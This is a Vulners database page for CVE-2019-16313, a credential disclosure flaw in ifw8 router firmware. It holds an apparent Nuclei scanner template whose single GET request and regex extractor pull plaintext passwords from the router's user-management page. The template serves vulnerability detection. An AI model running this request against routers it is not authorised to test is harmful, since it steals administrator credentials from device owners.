| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 8 Dec 202020:38 | – | gitee | |
| Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 6 May 202015:20 | – | gitee | |
| CVE-2019-16313 | 21 Sep 202106:42 | – | circl | |
| CVE-2019-16313 | 14 Sep 201915:22 | – | cve | |
| CVE-2019-16313 | 14 Sep 201915:22 | – | cvelist | |
| CVE-2019-16313 | 14 Sep 201916:15 | – | nvd | |
| CVE-2019-16313 | 14 Sep 201916:15 | – | osv | |
| Design/Logic Flaw | 14 Sep 201916:15 | – | prion | |
| CVE-2019-16313 | 7 Jan 202609:30 | – | redhatcve |
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 - Credential Discovery
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
impact: |
An attacker can exploit this vulnerability to discover sensitive credentials.
remediation: |
Update the ifw8 Router ROM to a version that is not affected by CVE-2019-16313.
reference:
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://nvd.nist.gov/vuln/detail/CVE-2019-16313
- http://www.iwantacve.cn/index.php/archives/311/
- https://github.com/CnHack3r/Penetration_PoC
- https://github.com/apachecn-archive/Middleware-Vulnerability-detection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-16313
cwe-id: CWE-798
epss-score: 0.47034
epss-percentile: 0.98689
cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ifw8
product: fr6_firmware
tags: cve,cve2019,exposure,router,iot,ifw8,vuln
http:
- method: GET
path:
- '{{BaseURL}}/action/usermanager.htm'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
part: body
# digest: 4b0a00483046022100cf9b6e5eadb7e2a17e9283e9b5ad53f46ee886bc26460ca521595f5f4279e756022100ba7a0037cef62fa778ada6fb8a976718ab9d953b7bd5f480936cdeda74ae5cb4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation